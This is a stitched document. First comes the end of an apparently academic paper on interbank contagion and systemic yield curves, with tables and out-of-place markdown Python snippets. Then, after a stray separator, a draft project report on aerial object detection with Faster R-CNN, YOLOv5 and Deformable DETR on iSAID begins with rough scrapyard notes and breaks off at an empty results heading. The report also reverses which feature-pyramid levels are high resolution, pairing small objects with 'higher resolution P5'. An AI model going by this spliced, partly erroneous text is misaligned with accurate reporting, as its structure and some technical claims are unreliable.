When accounting for the network effects, the pro-cyclicality of the capital adequacy regulation implies that banks are forced to move their investments into the risk-free asset when under stress. This means that once a bank is stressed, its cash account has lower volatility and the institution is less able to recover when the external asset value increases; because of default contagion, once a bank defaults it will drag its counterparties down as well, potentially precipitating a cycle of contagion.
We wish to conclude this case study by commenting briefly on the dependence of $\boldsymbol{\alpha}^*$ on the risk-weights $w := w_1 = w_2$.
If this risk-weight is set too low (below approximately $0.52$ for this example), then the banks will not be constrained at all by the regulatory environment. Therefore, under such a setting, the resulting interest rates are identical to those under $\boldsymbol{\alpha}^0$.
Conversely, if this risk-weight is set too high (above approximately $2.34$ for this example), then the banks will not be able to invest in the risky (external) asset at all due to the regulatory constraints. Therefore, under such a setting, the resulting interest rates are 0 (identical to those under $\boldsymbol{\alpha}^1$ which are not displayed above) due to the construction of this system.
Around these threshold risk-weights, the term structures can be highly sensitive to the regulatory environment. Therefore, naively or heuristically setting regulatory constraints can result in large unintended risks. We wish to highlight the recent works of~\cite{feinstein2020capital,banerjee2021price} which provide discussions on determining risk-weights to be consistent with systemic risk models.
\subsubsection{Dependence on leverage}\label{sec:Kmaturity-cs-leverage}
Having explored the impact of the investment strategy on the yield curve in Section~\ref{sec:Kmaturity-cs-term}, we now wish to explore how the (initial) leverage of the banking book can impact the shape of the term structure. Specifically, as will be demonstrated with the numerical experiments herein, we find a normal term structure when the leverage is low enough, which becomes inverted for riskier scenarios.
As with Section~\ref{sec:Kmaturity-cs-term}, we consider a variation of the $n = 2$ network of Section~\ref{sec:1maturity-cs-path} with $\ell = 10$ time steps where we will vary only the interbank assets and liabilities.
The banking book leverage ratio, i.e., assets over equity assuming all debts are paid in full, at time $t = 0$ for bank $1$ is given by:
\[\lambda_1 := \frac{x_1(0) + \sum_{l = 0}^\ell L_{21}^l}{x_1(0) - \sum_{l = 0}^\ell L_{10}^l} = 1.5 + \bar L_{21}\]
for $\bar L_{21} = \sum_{l = 0}^\ell L_{21}^l \geq 0$ (where $x_1(0) = 1.5$ and $\sum_{l = 0}^{\ell} L_{10}^l = 0.5$ by construction); similarly $\lambda_2 := 1.5 + \bar L_{12}$ for $\bar L_{12} = \sum_{l = 0}^\ell L_{12}^l \geq 0$.
As in our prior case studies, we will assume the banking book for the two banks are symmetric so that $\bar L := \bar L_{12} = \bar L_{21}$ and, therefore also, $\lambda := \lambda_1 = \lambda_2$ throughout this example.
In contrast to Section~\ref{sec:Kmaturity-cs-term}, here we assume all obligations are split deterministically so that:
\[L_{12}^l = L_{21}^l = \begin{cases} \bar L/3 &\text{if } l \in \{3,6,10\} \\ 0 &\text{else} \end{cases}
\quad \text{ and } \quad
L_{10}^l = L_{20}^l = \begin{cases} 1/6 &\text{if } l \in \{3,6,10\} \\ 0 &\text{else.} \end{cases}\]
That is, only three dates ($t \in \{0.3,0.6,1\}$) serve as maturities for debts, with all liabilities split equally over those dates.
To complete the setup, we will assume that all banks follow the optimal rebalancing strategy $\boldsymbol{\alpha}^*$ (as proposed in Example~\ref{ex:Kmaturity-opt}) with $w := w_1 = w_2 = 2$ and $\theta = 0.08$.
\begin{figure}
\centering
\includegraphics[width=0.6\textwidth]{2bankTerm-leverage-zoom.eps}
\caption{Section~\ref{sec:Kmaturity-cs-leverage}: The term structure for both banks 1 and 2 under varying leverage ratios $\lambda \in [1.5,2.5]$.}
\label{fig:leverage}
\end{figure}
First, we want to comment on the impact that increasing the leverage $\lambda$ of the two banks has on the health of the financial system. As seen in Figure~\ref{fig:leverage}, the system exhibits higher (implied) interest rates $R_i^*(t_l)$ at every time $t_l$ under higher leverage. That is, the probability of a default (as measured at time $0$) increases as the initial leverage $\lambda$ increases. This is as anticipated because higher leverage corresponds to firms that are less robust to financial stress, i.e., a smaller shock is required to cause a bank to default.
\begin{table}[t]
\centering
{\footnotesize
\begin{tabular}{|c||c|c|c|c|c|c|c|c|c|c|c|}
\cline{2-12}
\multicolumn{1}{c|}{} & \multicolumn{11}{|c|}{Leverage $\lambda$} \\ \cline{2-12}
\multicolumn{1}{c|}{} & 1.5 & 1.6 & 1.7 & 1.8 & 1.9 & 2.0 & 2.1 & 2.2 & 2.3 & 2.4 & 2.5 \\
\cline{2-12}\hline
$t = 0.3$ & 0.00\% & 0.00\% & 0.00\% & 0.00\% & 0.00\% & 0.00\% & 0.00\% & 0.00\% & 0.00\% & 13.41\% & 13.41\% \\ \hline
$t = 0.6$ & 0.00\% & 0.23\% & 0.23\% & 0.69\% & 0.69\% & 1.62\% & 2.57\% & 4.01\% & 4.99\% & 11.20\% & 11.20\% \\ \hline
$t = 1.0$ & 0.24\% & 0.33\% & 0.43\% & 0.80\% & 1.01\% & 1.42\% & 2.07\% & 2.71\% & 3.32\% & 6.79\% & 6.79\% \\ \hline
\end{tabular}
}
\caption{Section~\ref{sec:Kmaturity-cs-leverage}: Yields for obligations as measured at time $0$.}
\label{table:leverage}
\end{table}
As obligations are only due at $t \in \{0.3,0.6,1\}$, we wish to consider the interest rates $R_i^*(t_l)$ for those dates specifically. As displayed in Table~\ref{table:leverage}, when the leverage $\lambda$ is small ($\lambda < 2.0$), the interest rates charged are monotonically increasing over time, i.e., a normal yield curve. In particular, this occurs at $\bar L = 0$ (i.e., $\lambda = 1.5$) when no interbank network exists; such a scenario can be compared with, e.g.,~\cite{black1976valuing} where a single firm is studied in isolation. As the leverage $\lambda$ grows via the increased size of the interbank network, the risk of defaults grows as well. This increased network size eventually leads to an inverted yield curve, i.e., one in which the implied interest charged on obligations due at $t = 1$ is lower than on those due at $t = 0.6$. Unless the leverage is sufficiently high ($\lambda \geq 2.4$), no defaults are realized at the first maturity $t = 0.3$ at all. The banks otherwise always make all payments due at $t = 0.3$ because of the tree structure considered herein; specifically, a bank fails to make payments on an early obligation only if it is already close to default at $t = 0$, as the tree model of~\cite{he1990convergence} does not model extreme events.
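The qualitative link between default probabilities and implied rates can be illustrated with a standard bond-pricing identity. Note this is a generic sketch under an assumed recovery convention, not the exact construction of $R_i^*(t_l)$ inside the model:

```python
import math

def implied_yield(survival_prob, t, r=0.0, recovery=0.0):
    """Continuously compounded yield implied by a cumulative default
    probability: a unit claim due at t is priced at
    exp(-r t) * (q + (1 - q) * recovery), and exp(-R t) equals that price."""
    price = math.exp(-r * t) * (survival_prob + (1.0 - survival_prob) * recovery)
    return -math.log(price) / t

# e.g., a 1% cumulative default probability by t = 0.6 with zero recovery
R = implied_yield(0.99, 0.6)
```

On this identity, a cumulative default probability that grows slower than linearly in the horizon produces an annualized curve that slopes downward, the same qualitative pattern as the inverted curves above.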
\subsubsection{A core-periphery network}\label{sec:Kmaturity-cs-cp}
In this final case study, we want to consider a larger financial network than used previously. Specifically, we will study the core-periphery structure for a financial network which has been found in several empirical studies (e.g.,~\cite{CP14,FL15,veld2014core}). In this system we will assume that there are 2 core banks, 10 peripheral banks, and a societal node, i.e., $n = 12$ banks. Each core bank owes the other core bank \$3, all of the peripheral banks \$0.50, and society \$5. The peripheral banks owe both core banks \$0.50, nothing to the other peripheral banks, and \$1 to society.
These obligations will be equally split at times $0.2,~0.4,~0.6,~0.8,~1$ with $\ell = 5$.
As before, we will assume the prevailing risk-free interest rate $r = 0$.
As in Section~\ref{sec:Kmaturity-cs-leverage}, we will assume that all banks follow the optimal investment strategy $\boldsymbol{\alpha}^*$ presented in Example~\ref{ex:Kmaturity-opt} with $w_i = 2$ for every bank $i$ and with regulatory threshold $\theta = 0.08$.
Finally, the external assets are as follows. The core banks begin at time $t = 0$ with \$15 in external assets each. The peripheral banks begin with \$3 in external assets each. The correlation between any pair of bank assets is fixed at $\rho = 0.3$.
We will study two scenarios for the external asset volatilities:
\begin{enumerate}
\item a low volatility (unstressed) setting in which the volatility of the external assets for either core bank is $\sigma_C^2 = 0.75$ and the volatility for the external assets of any peripheral bank is $\sigma_P^2 = 0.5$;
\item a high volatility (stressed) setting in which the volatility of the external assets for either core bank jumps upward to $\sigma_C^2 = 1$ while the volatility for the peripheral banks is unaffected ($\sigma_P^2 = 0.5$).
\end{enumerate}
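For reference, the nominal obligations of this core-periphery system can be assembled into a liability matrix; the following is a plain-Python sketch in which indexing node 0 as society is our own convention:

```python
def core_periphery_liabilities(n_core=2, n_periph=10,
                               core_core=3.0, core_periph=0.5, core_soc=5.0,
                               periph_core=0.5, periph_soc=1.0):
    """Total nominal liability matrix L, where L[i][j] is the amount
    node i owes node j; node 0 is society, 1..n_core are core banks,
    and the remaining indices are peripheral banks."""
    n = 1 + n_core + n_periph
    L = [[0.0] * n for _ in range(n)]
    core = range(1, 1 + n_core)
    periph = range(1 + n_core, n)
    for i in core:
        L[i][0] = core_soc
        for j in core:
            if j != i:
                L[i][j] = core_core
        for j in periph:
            L[i][j] = core_periph
    for i in periph:
        L[i][0] = periph_soc
        for j in core:
            L[i][j] = periph_core
    return L

L = core_periphery_liabilities()
# each core bank owes 5 + 3 + 10 * 0.5 = 13 in total; each peripheral owes 2
```

Dividing each entry by 5 gives the per-maturity obligations, since all debts are split equally over the five dates.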
\begin{figure}[h]
\centering
\begin{subfigure}[t]{0.45\textwidth}
\centering
\includegraphics[width=\textwidth]{CP-unstressed.eps}
\caption{The low volatility (unstressed) setting.}
\label{fig:cp-unstressed}
\end{subfigure}
~
\begin{subfigure}[t]{0.45\textwidth}
\centering
\includegraphics[width=\textwidth]{CP-stressed.eps}
\caption{The high volatility (stressed) setting.}
\label{fig:cp-stressed}
\end{subfigure}
\caption{Section~\ref{sec:Kmaturity-cs-cp}: The term structure for the core and peripheral banks under the two stress scenarios (i.e., $\sigma_C^2 = 0.75$ and $\sigma_C^2 = 1$ respectively).}
\label{fig:cp}
\end{figure}
As depicted in Figure~\ref{fig:cp-unstressed}, in the low volatility (unstressed) setting, all banks in the system have a normal yield curve with interest rates $\vec{R}^*(t_l)$ in the low single digits at each maturity date. In comparison, in the high volatility (stressed) setting displayed in Figure~\ref{fig:cp-stressed}, all banks have an inverted yield curve with interest rates in the double digits. Notably, the stress scenario only includes an increase in the core volatilities $\sigma_C^2$ without any direct change to the balance sheets of the peripheral banks. Therefore, the change in the term structure for the peripheral banks is driven entirely by contagion from stresses to the core institutions. Though this is a stylized system, it highlights the importance of regulating systemically important financial institutions (i.e., core banks), as their stress can readily spread throughout the entire financial system.
\section{Conclusion}\label{sec:conclusion}
\subsection{Policy implications}
Within this work, we have constructed a dynamic model of the interbank network with forward-looking probabilities of default. In doing so, we found (numerically) that even small shocks that do not precipitate short-term default can still be relevant for stress testing purposes. For instance, as seen in Section~\ref{sec:Kmaturity-cs-cp}, stressing the volatility of core institutions can cause large impacts on the risk of future defaults through the feedback mechanisms. In this way, stress tests can be constructed so that the long-term effects of the stress scenario filter backwards in time to harm financial stability without having to trigger short-term actualized defaults. This is distinct from how stress testing is typically carried out, in which only the short-term liquidity of firms is paramount (i.e., in line with the one-period models of, e.g.,~\cite{EN01,RV13,GK10}).
Furthermore, recent works (see, e.g.,~\cite{greenwood2022predictable}) have explored the possibility of predicting \emph{future} financial crises from the available data. Empirical works (such as~\cite{bluwstein2021credit,babecky2014banking}) in this direction find that the shape of the yield curve can have strong predictive power. As we are able to construct a systemic term structure, our model is able to endogenize some of those effects due to the contagion through the probability of defaults. In particular, we construct a structural model for this type of contagion which provides some theoretical backing to the observations regarding the predictive power of yield curves. Such results point to the possibility of probabilistic stress tests in which the resulting systemic yield curves -- and the resulting possibility of a financial crisis -- are the primary outcomes.
\subsection{Extensions}
We wish to conclude by considering two important extensions of the framework presented herein.
First, due to the exponential size of trees in the number of banks and the number of time steps, simulating large networks is computationally expensive. One important extension of this work is finding a Monte Carlo approach to approximate the clearing solutions for larger systems. Formulating such a numerical method requires further consideration due to the forward-backward construction of this model; specifically, we cannot simply simulate the process backwards in time with a least squares Monte Carlo approach. Furthermore, typical least squares Monte Carlo approaches perform poorly for this model because fixed points and equilibria are often sensitive to the parameters which leads to flawed regressions.
A second natural extension would be to consider the continuous-time limit. In particular, one may ask if the discrete stochastic integral representations provided by Remark \ref{rem:integral} propagate to the limit, similarly to the results of \cite{he1990convergence} for passing from discrete- to continuous-time within the classical Black--Scholes framework. Due to the dependence on the conditional probability of default, this may be viewed as a new type of McKean--Vlasov problem related to continuous-time McKean--Vlasov problems for hitting times that have recently been studied in the probability literature as per Remark \ref{rem:mckean-vlasov}. When restricting to the filtration generated by the Brownian motions, the particular structure of our model allows it to be recast as a system of forward-backward stochastic differential equations, but the analysis of this system does not seem to fit within the scope of any known results, thus calling for new mathematical developments.
\bibliographystyle{plainnat}
|
\section{Salem Scrapyard}
Please do not delete any of this; just comment it out instead.
\subsection{One-Stage Object Detector}
\subsection{Two-Stage Object Detector}
\subsection{iSAID}
There are various aerial and satellite imagery datasets used to train models for tasks like classification, object detection, and semantic segmentation [][][][]. In iSAID \cite{waqas2019isaid}, a collection of large-scale, densely annotated aerial images is made suitable for instance segmentation. *Maybe note that this is an extended version of DOTA?
\subsection{COCO Format}
Datasets dedicated to visual tasks such as object detection or segmentation consist of images and their metadata. The metadata file includes label information for each image, with annotations of bounding boxes specifying the location of each category found in every image. A widely used dataset is MS COCO \cite{10.1007/978-3-319-10602-1_48}, used as a benchmark; its data structure, termed the COCO format, was found to be convenient for many subsequent datasets and models. iSAID metadata for labelled annotations was provided in COCO JSON format, which had to be converted into YOLO TXT format using an algorithm, such that every file corresponded to an existing image, stored under the label folder. Each text file includes a number of lines depending on the number of annotated objects and their bounding boxes.
\subsection{Discussion}
\subsubsection{Background}
Recommended to use background images that would make up 1 to 10 percent of the total dataset used for training.\
Train set has 84,087 (16,384) labeled @ 19.48 percent.\ Background images are 5.132 times greater than labeled.\
Validation set has 28,536 (6,049) labeled @ 21.19 percent. Background images 4.717 times greater than labeled.
Test set has 19,377.\
This resulted in longer training and validation time for our models; 5 epochs would take around 5 hrs, and for a good model to be trained it is expected to have at least 300 epochs.\
Along with all modifications expected to be done to achieve a good trade-off between accuracy and speed, the current setup did not allow for a shorter training time.\
Test1:
5 epochs for 5s and 5l @ 640, batch-size of 16.\
remark: no instances images, only labeled images training = 16,384, validation = 6,049.\
The time taken per epoch for yolo5l used to take as long as 31 minutes, but now after the adjustment which involved removing all extra background images, one epoch takes around 6.24 minutes.\
Accuracy performance improved by between 6.1 percent and 13.2 percent for 5s and 5l respectively; however, it is important to note that even the validation set did not have any background images, and thus there was no method implemented to reduce the rate of false-positive detections.\
The time taken per epoch for yolo5s used to take as long as 14.67 minutes, but now after the adjustment which involved removing all extra background images, one epoch takes around 6 to 7 minutes.
Test2: add 10 percent background for test+validation\
Increase in test time and slight decrease in overall accuracy, with increases in low-performing classes.
2.32 minutes to 2.51 on yolov5s
6.24 minutes to 6.41 minutes on yolov5l
\subsubsection{Hyperparameter}
For yolov5, to adjust hyperparameters it can be done through scratch or finetune files depending on specified settings.
Hyperparameter evolution is used ..
\subsubsection{Thresholds}
A baseline model trained on fixed parameters is used as a reference for upcoming models, which will be trained by tweaking various parameters and training settings. The first sign of progress is always noted in the results obtained by evaluating the model on the validation set during the training phase. However, this indicator is not sufficient; as a result, additional efforts were made to evaluate the model visually. The first experiment involved loading the trained model on the test set, where the output generated is a set of images with multiple bounding boxes for detected objects. Visually, the results were promising as there were neither multiple bounding boxes per object nor weak guesses where different classes are predicted in the same bounding box. The second experiment involved validating the compiled JSON file, which was converted from the set of labeled text files generated by the model. Note that the two visual experiments differ in output: the first outputs images and the second outputs results for each image in text format. Using FiftyOne [], an evaluation tool developed by Voxel51 for models and datasets, the JSON file was loaded along with the directory of test images to visually evaluate the model's performance and confirm the usability of the compiled JSON file. \
Confidence threshold and IoU threshold tweaking to increase model performance. \
** add examples \
\subsubsection{Tweak-able Parameters}
batch size, img size, epoch, confidence threshold, IoU threshold, background percentage, prune, loss function.
\subsubsection{Sparse vs Dense}
\section{Introduction}
Object detection is a very popular computer vision task which involves both objects locating and classifying in an image.
Though this task has been extensively studied for usual natural images, there is limited exploration in the field of aerial object detection. Aerial object detection brings various challenges such as large scale variation, uneven distribution of objects, class imbalance etc. which further makes the detection of objects much more demanding. However, the problem is particularly interesting due to its important applications such as defence, forestry, city planning etc.
In this project we have performed experiments on the iSAID dataset which is a Large-scale Dataset for Object detection and Instance Segmentation in Aerial Images (iSAID) \cite{waqas2019isaid}. It includes 2,806 high-resolution images taken by satellites, and collects 665,451 densely annotated object instances, belonging to a total of 15 classes.
In this work we first perform object detection in aerial images using two-stage, one-stage and attention-based detectors. Owing to the significant variation in the model architectures, it is natural that the same modification may not be suitable for all architectures. Hence, we describe the modifications and analysis performed for each of the 3 models. \textbf{For the two-stage model}, we have used the Faster R-CNN architecture, where we introduced modifications such as a weighted attention-based FPN to better handle scale variation, a simple class-balanced sampler to handle the inherent long-tail distribution, and a density prediction head to tackle the large density variation observed in and among different images. \textbf{For the one-stage model}, we have used the YOLOv5 model and analysed the performance with the addition of a weighted focal loss to counter class imbalance and an FPN in an attempt to deal with various scales. \textbf{For the attention-based detector,} we have used the DETR model. We analysed the effect of different attention levels, such as single-scale and multi-scale attention, and the impact of different backbones such as ResNet-50 and ResNet-101.
And finally, we demonstrate a comparison between each of the considered detectors with respect to aerial object detection.
\section{Methods}
The iSAID dataset and the architectures we experimented with (two-stage, one-stage and attention-based object detectors) are discussed in the following subsections.
\subsection{Dataset}
A Large-scale Dataset for Object Detection and Instance Segmentation in Aerial Images (iSAID) \cite{waqas2019isaid} is the dataset which was specifically developed for the tasks of object detection, semantic and instance segmentation of aerial images. It includes 2,806 high-resolution images taken by satellites, and collects
665,451 densely annotated object instances, belonging to a total of 15 classes. The iSAID follows the same annotation format used in the popular MS COCO dataset and provides bounding boxes and pixel-level annotations, where each pixel represents a particular class (or absence of any). To accommodate the input-size limitations of the models used, the original images were cropped into equal overlapping patches of 800x800px resolution.
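The patching step can be sketched as follows. The 600px stride (i.e., a 200px overlap between adjacent patches) is an illustrative assumption, since the exact overlap is not specified here:

```python
def patch_origins(width, height, patch=800, stride=600):
    """Top-left corners of overlapping fixed-size patches covering an image.
    The last patch in each direction is shifted back so it stays inside
    the image instead of overrunning the border."""
    def starts(size):
        xs = list(range(0, max(size - patch, 0) + 1, stride))
        if xs[-1] + patch < size:
            xs.append(size - patch)
        return xs
    return [(x, y) for y in starts(height) for x in starts(width)]

# a 2000x800 strip yields three shifted 800x800 crops along its width
```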
\begin{figure} [!ht]
\centering
\includegraphics[scale = 0.69]{Images/Dmitry/1_Labels_per_class.png}
\caption{Number of instances per each class in the train and validation sets of the iSAID dataset \cite{waqas2019isaid}. Notations: ST - storage tank, BD - baseball diamond, TC - tennis court, BC - basketball court, GTF - ground track field, LV - large vehicle, SV - small vehicle, HC - helicopter, RA - roundabout, SBF - soccer ball field, SP - swimming pool.}
\label{fig:labels}
\end{figure}
The dataset has several distinguishing characteristics, such as a large number of images with high spatial resolution, a large count of labelled instances per image (which might help in learning contextual information), noticeable scene variation depending on the object type, and an imbalanced and uneven distribution of objects. One of the most important characteristics of the dataset is its huge size and the scale variation of the objects, with instance sizes ranging from 10x10px to 300x300px, which is also the case for instances of the same class. A representation of some of the above-mentioned properties can be seen in Figure~\ref{fig:labels}.
\subsection{Two stage detector}
Several two-stage approaches have been developed for object detection. R-CNN \cite{girshick2014rich} used a selective search algorithm to generate bounding box proposals. Fast R-CNN \cite{girshick2015fast} is an extension of R-CNN \cite{girshick2014rich} which enabled end-to-end training using shared convolutional features, thus improving train and inference speed while also increasing detection accuracy. Faster R-CNN \cite{ren2016faster} replaced selective search with a Region Proposal Network (RPN), which generates multi-scale and translation-invariant region proposals based on the high-level features of images. It uses RoI pooling to crop the feature maps according to the proposals. This is followed by a small convolutional network with classification and regression branches. We have carried out experiments using Faster R-CNN implemented in the Detectron2 \cite{wu2019detectron2} framework with a ResNet-101 FPN backbone. We introduced some modifications in the Faster R-CNN architecture in order to address issues specific to the dataset, as explained below.\\
\textbf{Handling scale variation: } The feature pyramid network has been a popular approach to handle scale variation. It includes a bottom-up network and a top-down network connected using 1x1 lateral connections. This is followed by a convolutional layer with a large kernel to increase the receptive field. However, the FPN still struggles to deal with huge scale variation. This motivated us to introduce a modification in the FPN so that it can better handle varying sizes of objects.
It is well known that small objects are more likely to be identified in the higher resolution layer P5, medium-sized objects in layers P4/P3, and large objects in the low resolution layers P2/P3 of the FPN. This indicates that having access to more information, i.e., from high resolution feature maps, could be helpful in dealing with varying sizes of objects.
We operationalized this intuition by transferring information from higher resolution feature maps to lower resolution feature maps. This information is incorporated in the form of channel attention over the feature maps, drawing inspiration from works such as Squeeze-and-Excitation blocks \cite{hu2019squeezeandexcitation} and CBAM \cite{woo2018cbam}. With this change alone, an improvement in mAP was observed, but it was prominent only for medium and large objects, which appears logical. Thus, in order to better deal with small objects as well, we introduced a small weighting factor for each of the output feature maps as shown in Fig \ref{fig:fpn}, where $wt_4$ $>$ $wt_3$ $>$ $wt_2$ $>$ $wt_1$.
\begin{figure}[!ht]
\centering
\includegraphics[width=0.8\linewidth]{Images/FPN.png}
\caption{Weighted FPN with channel attention}
\label{fig:fpn}
\end{figure}
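A stripped-down sketch of the per-level gating is given below. For brevity the two fully connected excitation layers of a full SE block are collapsed into a single learned per-channel weight, so this illustrates the mechanism rather than reproducing the exact implementation:

```python
import math

def channel_attention(feature, gate_weights, level_weight):
    """SE-style channel attention sketch: squeeze each channel by global
    average pooling, gate it through a sigmoid of a learned per-channel
    weight, then scale the whole level by its FPN weight (wt_1..wt_4).
    `feature` is a [C][H][W] nested list; `gate_weights` stands in for
    the learned excitation layers of the full block."""
    sigmoid = lambda z: 1.0 / (1.0 + math.exp(-z))
    out = []
    for c, channel in enumerate(feature):
        pooled = sum(sum(row) for row in channel) / (len(channel) * len(channel[0]))
        gate = sigmoid(gate_weights[c] * pooled)
        out.append([[level_weight * gate * v for v in row] for row in channel])
    return out
```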
\textbf{Handling class imbalance: } In the iSAID dataset, a lot of class imbalance is observed, as also depicted in Fig \ref{fig:labels}. This corresponds to the problem of long-tail distribution, where some classes have a large number of instances and some classes have very few. This can in turn cause the model to be biased towards the frequent classes and hence perform worse on the rare classes. We address this issue by implementing a class-balanced foreground sampler in the RoI head. Based on the statistics of the dataset, we segregated the classes into 3 different groups, i.e., frequent, common and rare, and adjusted the number of proposals for each group.\\
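The sampler logic can be sketched as follows; the function names are illustrative, and the fallback behavior when a group has too few proposals is our own simplification:

```python
import random

def balanced_foreground_sample(proposals, group_of, quotas):
    """Sample foreground proposals with a fixed quota per frequency group,
    e.g. quotas = {'rare': 24, 'common': 20, 'frequent': 20}; takes
    whatever is available when a group has fewer proposals than its quota."""
    by_group = {g: [] for g in quotas}
    for p in proposals:
        by_group[group_of(p)].append(p)
    picked = []
    for g, k in quotas.items():
        pool = by_group[g]
        picked += random.sample(pool, min(k, len(pool)))
    return picked
```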
\textbf{Handling uneven distribution/ modelling context: } From the dataset, it can be observed that there is a lot of variation in the distribution of instances within an image as well as across the dataset. This uneven distribution of instances could confuse the model due to the persistent variation. This motivated us to model the distribution/context around an object instance and introduce a density prediction head in the RPN. The density prediction head was first introduced in the Adaptive NMS paper \cite{liu2019adaptive}, where it was used to capture the surrounding density in order to adaptively adjust the NMS threshold. However, we use the same density prediction head for a different objective.
It stacks the classification and bounding box regression branch feature maps along with the output of a 1x1 convolutional layer. This is followed by a convolutional layer with a 5x5 kernel, which effectively helps capture considerable information in the surroundings of an object as shown in Fig \ref{fig:density}. The corresponding ground-truth density is calculated as $d_i := \max_{b_j \in \mathcal{G},\, j \neq i} \mathrm{iou}(b_i, b_j)$, where the density of object $i$ is defined as the maximum bounding box IoU with the other objects in the ground-truth set $\mathcal{G}$, and smooth L1 loss is used for this branch.
Furthermore, to the best of our knowledge we are the first to employ the density prediction head for aerial imagery.
\begin{figure}[!ht]
\centering
\includegraphics[width=\linewidth]{Images/density.png}
\caption{Density prediction head for the Faster R-CNN}
\label{fig:density}
\end{figure}
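The density targets reduce to a pairwise-IoU computation; a minimal sketch:

```python
def iou(a, b):
    """IoU of two boxes in (x1, y1, x2, y2) format."""
    ix = max(0.0, min(a[2], b[2]) - max(a[0], b[0]))
    iy = max(0.0, min(a[3], b[3]) - max(a[1], b[1]))
    inter = ix * iy
    area = lambda t: (t[2] - t[0]) * (t[3] - t[1])
    union = area(a) + area(b) - inter
    return inter / union if union > 0 else 0.0

def density_targets(boxes):
    """Ground-truth density d_i = max IoU of box i with any other ground-truth
    box, as in Adaptive NMS; 0 for an isolated object."""
    return [max((iou(b, o) for j, o in enumerate(boxes) if j != i), default=0.0)
            for i, b in enumerate(boxes)]
```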
\subsection{One stage detector}
In one-stage detectors, a one-shot configuration replaces region proposals, such that classification and regression take place immediately on candidate anchor boxes. With this improvement, the architecture is simpler and the inference time is more suitable for realistic applications. SSD, YOLO and RetinaNet are examples of one-stage detectors \cite{7780460} \cite{DBLP:journals/corr/LiuAESR15} \cite{DBLP:journals/corr/abs-1708-02002}. The YOLOv5 architecture consists of three parts: (1) Backbone: CSPDarknet, (2) Neck: PANet, and (3) Head: YOLO layer. The images are first input to CSPDarknet for feature extraction, then fed to PANet for feature fusion. Finally, the YOLO layer outputs detection results (class, score, location, size).\\
We introduced some modifications in the YOLOv5 architecture in order to address some issues specific to the dataset, as explained below.\\
\textbf{Focal Loss :} The iSAID dataset consists of multiple object classes which can be grouped based on the number of occurrences per image; certain object classes, such as small vehicles, have far higher occurrence rates than classes such as bridge, helicopter, or roundabout, as shown in figure \ref{fig:labels}.
For model training, a certain number of training examples per class is expected, under an overall assumption of an equal distribution of data; otherwise the model may be biased. In \cite{lin2018focal}, a workaround for class imbalance is introduced as an extension of the cross-entropy loss function, named focal loss. Focal loss has two adjustable parameters, $\gamma$ and $\alpha$. Increasing the $\gamma$ value shifts the model's attention towards object classes which are difficult to classify, and increasing the $\alpha$ value assigns greater weight to object classes with fewer annotations.
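The per-example loss can be written in a few lines; the binary form is shown here for clarity, as a sketch of the idea rather than the exact multi-class form used in training:

```python
import math

def focal_loss(p, y, alpha=0.25, gamma=2.0):
    """Binary focal loss FL(p_t) = -alpha_t * (1 - p_t)^gamma * log(p_t),
    where p is the predicted foreground probability and y in {0, 1}.
    Raising gamma down-weights well-classified (easy) examples; alpha
    reweights the positive class. With gamma = 0 and alpha = 1 it reduces
    to plain cross-entropy."""
    p_t = p if y == 1 else 1.0 - p
    alpha_t = alpha if y == 1 else 1.0 - alpha
    return -alpha_t * (1.0 - p_t) ** gamma * math.log(p_t)
```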
\textbf{Feature Pyramid Network :}
Motivated by scale variation and the ability of FPNs to deal with multiple scales, the YOLOv5 architecture was further enhanced with a Feature Pyramid Network. After adding the FPN, an mAP of 0.422 was observed on the validation set.
\subsection{Attention-based detector}
Another approach considered in this work is Deformable DETR (Deformable Transformers for End-to-End Object Detection) \cite{zhu2021deformable}, which is an attention-based detector. This recently proposed method attempts to eliminate the previous need for manually-designed components in object detection while still demonstrating good performance and efficiency.
As can be seen in the figure \ref{fig:deformable}, Deformable DETR combines two popular computer vision techniques, thereby leveraging their advantages in the way that they can be applied for solving drawbacks of each other.
The first component is a transformer-based object detection model, DETR (End-to-End Object Detection with Transformers) \cite{carion2020endtoend}. This recently published method solves the object detection task as a direct set prediction problem. The approach provides a streamlined detection pipeline and effectively removes the need for many hand-designed components, like a non-maximum suppression procedure or anchor generation, that explicitly encode prior knowledge about the task. The main ingredients of this framework, called DEtection TRansformer or simply DETR, are a set-based global loss that forces unique predictions via bipartite matching, and a transformer encoder-decoder architecture. Given a fixed small set of learned object queries, DETR identifies the relations of the objects and the global image context in order to directly output the final set of predictions in parallel. According to the code provided by the authors and various experiments, the model is conceptually simple and efficient, unlike the majority of other modern detectors. DETR demonstrates accuracy and run-time performance on par with the well-established and highly-optimised Faster R-CNN baseline \cite{ren2016faster}.
The second important part, used to build Deformable DETR, is Deformable Convolutional Networks \cite{dai2017deformable}. It was proved by the authors that the convolutional neural networks (CNNs) with original convolutional layers \cite{cnn} are inherently limited to model geometric transformations due to the fixed geometric structures. To solve this limitation by enhancing the transformation modeling capacity of CNNs, a deformable convolution module was introduced. It is based on the idea of augmenting the spatial sampling locations in the modules with additional offsets and learning the offsets from target tasks, without additional supervision. The new modules, as authors mentioned, can easily replace their plain counterparts in existing CNNs, and can be easily end-to-end trained by standard back-propagation. The high effectiveness of Deformable CNNs was also validated with extensive experiments on such complex vision tasks as object detection and semantic segmentation.
\begin{figure}[!ht]
\centering
\includegraphics[width=1.0\linewidth]{Images/Dmitry/1_Deformable.png}
\caption{Illustration of the deformable attention module (the aggregation part is not shown) \cite{zhu2021deformable}}
\label{fig:deformable}
\end{figure}
Therefore, the combination of both Deformable convolution, which helps to solve the problem of sparse spatial sampling, and DETR Transformer, which is responsible for relation modeling capability, results in a model that have such advantages as fast convergence, computational feasibility, and memory efficiency.
Moreover, the proposed multi-scale deformable attention architecture attends to only a small set of sampling locations on the feature map, while still having adequate performance, which the authors present as a reasonable replacement for the manually-optimised FPN and computationally inefficient full attention.
The results of extensive experiments with Deformable DETR provided in the original paper \cite{zhu2021deformable}, which was introduced with the goal of mitigating the slow convergence and high complexity issues of DETR, indeed demonstrate its superior effectiveness on the MS COCO benchmark \cite{lin2015microsoft}.
The visualisation of results indicates that the proposed combination of the above-mentioned modules in Deformable DETR looks at extreme points of the object to determine its bounding box, similar to the observation in DETR. More concretely, besides attending to the left/right and top/bottom boundaries of the object, Deformable DETR also attends to pixels inside the object when predicting its category, which differs from the original DETR \cite{carion2020endtoend}.
In addition, compared with its predecessor, Deformable DETR achieves better performance with a significantly smaller number of training epochs. This effect is especially noticeable on small objects, which is at the same time helpful for the considered iSAID dataset.
\section{Experiments and Results}
\subsection{Faster R-CNN}
